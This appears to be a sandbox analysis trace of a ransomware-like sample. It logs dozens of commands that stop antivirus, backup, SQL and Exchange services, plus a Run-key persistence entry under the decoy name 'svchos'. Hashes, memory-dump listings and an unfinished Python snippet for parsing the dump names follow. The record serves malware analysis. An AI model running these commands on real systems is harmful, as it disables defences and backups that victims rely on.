C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop RESvc /y4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop RESvc /y5⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop ShMonitor /y4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ShMonitor /y5⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop SMTPSvc /y4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SMTPSvc /y5⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop SmcService /y4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SmcService /y5⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop Smcinst /y4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop Smcinst /y5⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop SQLAgent$BKUPEXEC /y4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$BKUPEXEC /y5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop WRSVC /y6⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop mfevtp /y7⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop sophossps /y4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop sophossps /y5⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop SQLAgent$PRACTTICEBGC /y4⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop SQLAgent$ECWDB2 /y4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$ECWDB2 /y5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$PRACTTICEBGC /y5⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop SQLAgent$SBSMONITORING /y4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$SBSMONITORING /y5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop wbengine /y6⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop SQLAgent$SHAREPOINT /y4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$SHAREPOINT /y5⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop SQLAgent$SQL_2008 /y4⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$SQL_2008 /y5⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop SQLAgent$SYSTEM_BGC /y4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$SYSTEM_BGC /y5⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop SQLAgent$TPSAMA /y4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$TPSAMA /y5⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop SQLAgent$VEEAMSQL2008R2 /y4⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2008R2 /y5⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop SQLAgent$TPS /y4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$TPS /y5⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop SQLAgent$VEEAMSQL2012 /y4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2012 /y5⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop SQLAgent$PROFXENGAGEMENT /y4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$PROFXENGAGEMENT /y5⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop SQLAgent$PRACTTICEMGT /y4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$PRACTTICEMGT /y5⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop SntpService /y4⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop SNAC /y4⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop SepMasterService /y4⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop SDRSVC /y4⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop SAVService /y4⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop SAVAdminService /y4⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop SamSs /y4⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop sacsvr /y4⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop SQLSafeOLRService /y4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLSafeOLRService /y5⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop SQLSERVERAGENT /y4⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLSERVERAGENT /y5⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop SQLTELEMETRY$ECWDB2 /y4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLTELEMETRY$ECWDB2 /y5⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop SQLWriter /y4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLWriter /y5⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop SstpSvc /y4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SstpSvc /y5⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop SQLTELEMETRY /y4⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop swi_filter /y4⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop swi_filter /y5⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop swi_service /y4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop swi_service /y5⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop swi_update_64 /y4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop swi_update_64 /y5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop wbengine /y5⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop svcGenericHost /y4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop svcGenericHost /y5⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop TmCCSF /y4⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop TmCCSF /y5⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop TrueKey /y4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop TrueKey /y5⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop tmlisten /y4⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop UI0Detect /y4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop UI0Detect /y5⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop VeeamBackupSvc /y4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamBackupSvc /y5⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop VeeamBrokerSvc /y4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamBrokerSvc /y5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$SBSMONITORING /y5⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop VeeamCatalogSvc /y4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamCatalogSvc /y5⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop VeeamTransportSvc /y4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamTransportSvc /y5⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop VeeamRESTSvc /y4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamRESTSvc /y5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher /y6⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop VeeamNFSSvc /y4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamNFSSvc /y5⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop W3Svc /y4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop W3Svc /y5⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop SQLAgent$VEEAMSQL2008R2 /y4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2008R2 /y5⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop VeeamHvIntegrationSvc /y4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamHvIntegrationSvc /y5⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop "SQL Backups" /y4⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$PRACTTICEBGC /y6⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQL Backups" /y5⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop SQLAgent$CITRIX_METAFRAME /y4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$CITRIX_METAFRAME /y5⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSSQL$PROD /y4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$PROD /y5⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop "Zoolz 2 Service" /y4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Zoolz 2 Service" /y5⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSSQLServerADHelper /y4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLServerADHelper /y5⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop SQLAgent$PROD /y4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$PROD /y5⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop ekrn /y4⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ekrn /y5⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSSQL$SOPHOS /y4⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$SOPHOS /y5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLTELEMETRY /y5⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop ESHASRV /y4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ESHASRV /y5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop tmlisten /y6⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop SQLAgent$SOPHOS /y4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$SOPHOS /y5⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop AVP /y4⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop AVP /y5⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop klnagent /y4⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop klnagent /y5⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop EhttpSrv /y4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop EhttpSrv /y5⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop NetMsmqActivator /y4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop NetMsmqActivator /y5⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop msftesql$PROD /y4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop msftesql$PROD /y5⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop kavfsslp /y4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop kavfsslp /y5⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop KAVFSGT /y4⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop KAVFSGT /y5⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop mfefire /y4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop mfefire /y5⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop KAVFS /y4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop KAVFS /y5⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C REG ADD "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "svchos" /t REG_SZ /d "C:\users\Public\ZqqUZ.exe" /f4⤵
-
C:\Windows\system32\reg.exeREG ADD "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "svchos" /t REG_SZ /d "C:\users\Public\ZqqUZ.exe" /f5⤵
- Adds Run key to start application
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop wbengine /y4⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop SQLAgent$SQLEXPRESS /y4⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSSQL$SQLEXPRESS /y4⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop SQLAgent$CXDB /y4⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop swi_update /y4⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSSQL$VEEAMSQL2008R2 /y4⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop WRSVC /y4⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop wbengine /y4⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop VeeamMountSvc /y4⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop VeeamEnterpriseManagerSvc /y4⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop VeeamDeploySvc /y4⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop VeeamDeploymentService /y4⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop VeeamCloudSvc /y4⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop TrueKeyServiceHelper /y4⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop TrueKeyScheduler /y4⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop SQLBrowser /y4⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MySQL57 /y4⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSSQLSERVER /y4⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSSQLFDLauncher$TPSAMA /y4⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSSQLFDLauncher$TPS /y4⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSSQLFDLauncher$SYSTEM_BGC /y4⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSSQLFDLauncher$SQL_2008 /y4⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSOLAP$SYSTEM_BGC /y4⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSOLAP$SQL_2008 /y4⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSExchangeSRS /y4⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSExchangeES /y4⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MsDtsServer110 /y4⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MsDtsServer100 /y4⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV11⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV11⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MsDtsServer110 /y1⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV11⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSOLAP$TPSAMA /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$ECWDB2 /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSOLAP$TPS /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSOLAP$SYSTEM_BGC /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSOLAP$SQL_2008 /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSExchangeSRS /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSExchangeES /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MsDtsServer100 /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher$SYSTEM_BGC /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher$SQL_2008 /y1⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV11⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher$TPSAMA /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SamSs /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SAVService /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SDRSVC /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SNAC /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SntpService /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SepMasterService /y1⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV11⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MySQL57 /y1⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV11⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop TrueKeyScheduler /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamDeploymentService /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamEnterpriseManagerSvc /y1⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV11⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$CXDB /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop swi_update /y1⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV11⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$VEEAMSQL2008R2 /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$SQLEXPRESS /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$SQLEXPRESS /y1⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV11⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamMountSvc /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$PROFXENGAGEMENT /y2⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV11⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamDeploySvc /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamCloudSvc /y1⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV11⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV11⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k WerSvcGroup1⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
-
C:\Users\Public\ZqqUZ.exe (also recorded as C:\users\Public\ZqqUZ.exe; same file, identical hashes)
MD5: c0202cf6aeab8437c638533d14563d35
SHA1: 5767653494d05b3f3f38f1662a63335d09ae6489
SHA256: 8d3f68b16f0710f858d8c1d2c699260e6f43161a5510abb0e7ba567bd72c965b
SHA512: 02516128d43914d6ff1b7e702d25771aafd2edccee1729f88ad621cea15a648bb2737b87f564e0711e6f8f99c43eb406b3b6137c68086774f1417642d51c07c0
-
memory/428-135-0x0000000000000000-mapping.dmp
-
memory/652-126-0x0000000000000000-mapping.dmp
-
memory/748-125-0x0000000000000000-mapping.dmp
-
memory/900-132-0x0000000000000000-mapping.dmp
-
memory/1016-128-0x0000000000000000-mapping.dmp
-
memory/1312-129-0x0000000000000000-mapping.dmp
-
memory/1804-123-0x0000000008D00000-0x0000000008D62000-memory.dmp (Filesize 392KB)
-
memory/1804-117-0x0000000000400000-0x0000000006E8E000-memory.dmp (Filesize 106.6MB)
-
memory/1804-124-0x0000000000400000-0x0000000006E8E000-memory.dmp (Filesize 106.6MB)
-
memory/1804-119-0x0000000000400000-0x0000000006E8E000-memory.dmp (Filesize 106.6MB)
-
memory/1804-118-0x00000000004036B0-mapping.dmp
-
memory/2108-131-0x0000000000000000-mapping.dmp
-
memory/2436-187-0x00007FF655520000-0x00007FF655556000-memory.dmp (Filesize 216KB)
-
memory/2588-120-0x0000000000000000-mapping.dmp
-
memory/2688-133-0x0000000000000000-mapping.dmp
-
memory/2760-154-0x0000000000000000-mapping.dmp
-
memory/3096-130-0x0000000000000000-mapping.dmp
-
memory/3856-127-0x0000000000000000-mapping.dmp
-
memory/3976-115-0x0000000000400000-0x0000000003754000-memory.dmp (Filesize 51.3MB)
-
memory/3976-116-0x0000000003EB0000-0x0000000003F1B000-memory.dmp (Filesize 428KB)
-
memory/3976-114-0x0000000003E00000-0x0000000003EA7000-memory.dmp (Filesize 668KB)
-
memory/3984-136-0x0000000000000000-mapping.dmp
-
memory/4004-134-0x0000000000000000-mapping.dmp
-
memory/4124-152-0x0000000000000000-mapping.dmp
-
memory/4164-137-0x0000000000000000-mapping.dmp
-
memory/4172-156-0x0000000000000000-mapping.dmp
-
memory/4216-138-0x0000000000000000-mapping.dmp
-
memory/4276-139-0x0000000000000000-mapping.dmp
-
memory/4328-140-0x0000000000000000-mapping.dmp
-
memory/4404-141-0x0000000000000000-mapping.dmp
-
memory/4460-142-0x0000000000000000-mapping.dmp
-
memory/4512-153-0x0000000000000000-mapping.dmp
-
memory/4528-143-0x0000000000000000-mapping.dmp
-
memory/4588-144-0x0000000000000000-mapping.dmp
-
memory/4656-145-0x0000000000000000-mapping.dmp
-
memory/4724-146-0x0000000000000000-mapping.dmp
-
memory/4792-147-0x0000000000000000-mapping.dmp
-
memory/4868-148-0x0000000000000000-mapping.dmp
-
memory/4944-149-0x0000000000000000-mapping.dmp
-
memory/4952-155-0x0000000000000000-mapping.dmp
-
memory/5012-150-0x0000000000000000-mapping.dmp
-
memory/5068-151-0x0000000000000000-mapping.dmp
-
memory/5152-157-0x0000000000000000-mapping.dmp
-
memory/5216-158-0x0000000000000000-mapping.dmp
-
memory/5276-159-0x0000000000000000-mapping.dmp
-
memory/5284-173-0x0000000000000000-mapping.dmp
-
memory/5332-160-0x0000000000000000-mapping.dmp
-
memory/5396-161-0x0000000000000000-mapping.dmp
-
memory/5444-162-0x0000000000000000-mapping.dmp
-
memory/5512-163-0x0000000000000000-mapping.dmp
-
memory/5588-164-0x0000000000000000-mapping.dmp
-
memory/5624-174-0x0000000000000000-mapping.dmp
-
memory/5660-165-0x0000000000000000-mapping.dmp
-
memory/5716-175-0x0000000000000000-mapping.dmp
-
memory/5720-166-0x0000000000000000-mapping.dmp
-
memory/5784-167-0x0000000000000000-mapping.dmp
-
memory/5844-178-0x0000000000000000-mapping.dmp
-
memory/5848-168-0x0000000000000000-mapping.dmp
-
memory/5856-176-0x0000000000000000-mapping.dmp
-
memory/5928-169-0x0000000000000000-mapping.dmp
-
memory/5992-170-0x0000000000000000-mapping.dmp
-
memory/6044-171-0x0000000000000000-mapping.dmp
-
memory/6108-172-0x0000000000000000-mapping.dmp
-
memory/6116-177-0x0000000000000000-mapping.dmp
-
memory/6188-179-0x0000000000000000-mapping.dmp
-
memory/6216-180-0x0000000000000000-mapping.dmp
-
memory/6288-181-0x0000000000000000-mapping.dmp
-
memory/6336-182-0x0000000000000000-mapping.dmp
-
memory/6368-183-0x0000000000000000-mapping.dmp
-
memory/6400-184-0x0000000000000000-mapping.dmp
-
memory/6460-185-0x0000000000000000-mapping.dmp
-
memory/6480-186-0x0000000000000000-mapping.dmp
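The memory dump names above encode the PID, a sequence number and, for region dumps, the start and end virtual addresses; `mapping.dmp` entries record a single address (a thread start or entry point, such as 0x4036B0 in PID 1804) rather than a range. The parser below is an added example and not part of the sandbox report: it decodes those names, groups region dumps per PID, checks that the stated Filesize matches the address range, and lists PIDs whose dumped region begins at the default PE image base 0x400000, which in this report are the two processes (3976 and 1804) holding the large unpacked images. `SAMPLE_DUMPS` is constructed from entries in the Downloads list; treating the report's KB/MB as 1024-based units is an assumption that the size check confirms against those entries.

```python
import re
from collections import defaultdict

# memory/<pid>-<seq>-0x<start>-0x<end>-memory.dmp   (a dumped region)
# memory/<pid>-<seq>-0x<addr>-mapping.dmp            (a single mapped address)
DUMP_RE = re.compile(
    r"^memory/(?P<pid>\d+)-(?P<seq>\d+)-0x(?P<start>[0-9A-Fa-f]+)"
    r"(?:-0x(?P<end>[0-9A-Fa-f]+)-memory|-mapping)\.dmp$"
)

# Constructed sample: (dump name, stated Filesize or None), copied from the
# Downloads list in this report.
SAMPLE_DUMPS = [
    ("memory/1804-118-0x00000000004036B0-mapping.dmp", None),
    ("memory/1804-117-0x0000000000400000-0x0000000006E8E000-memory.dmp", "106.6MB"),
    ("memory/1804-123-0x0000000008D00000-0x0000000008D62000-memory.dmp", "392KB"),
    ("memory/2436-187-0x00007FF655520000-0x00007FF655556000-memory.dmp", "216KB"),
    ("memory/3976-115-0x0000000000400000-0x0000000003754000-memory.dmp", "51.3MB"),
    ("memory/3976-116-0x0000000003EB0000-0x0000000003F1B000-memory.dmp", "428KB"),
    ("memory/2588-120-0x0000000000000000-mapping.dmp", None),
]


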